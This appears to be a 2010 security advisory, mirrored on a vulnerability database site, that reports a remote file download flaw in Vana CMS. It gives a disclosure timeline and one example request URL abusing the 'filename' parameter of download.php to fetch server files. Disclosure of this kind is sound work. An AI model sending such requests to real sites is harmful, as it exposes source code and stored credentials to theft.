Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23613
HistoryApr 14, 2010 - 12:00 a.m.

Vana CMS Remote File Download

2010-04-1400:00:00
vulners.com
16

#################################################################

Securitylab.ir

#################################################################

Application Info:

Name: Vana CMS

Vendor: http://www.vanasoft.com

#################################################################

Vulnerability Info:

Type: Remote File Download

Risk: Medium

2009-10-23 - Found Vulnerability

2010-04-09 - Vendor notified

2010-04-11 - Public disclosure

#################################################################
Vulnerability:
http://site.com/download.php?filename=File.php
#################################################################

Discoverd By: Pouya Daneshmand

Website: http://Pouya.Securitylab.ir

Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com

###################################################################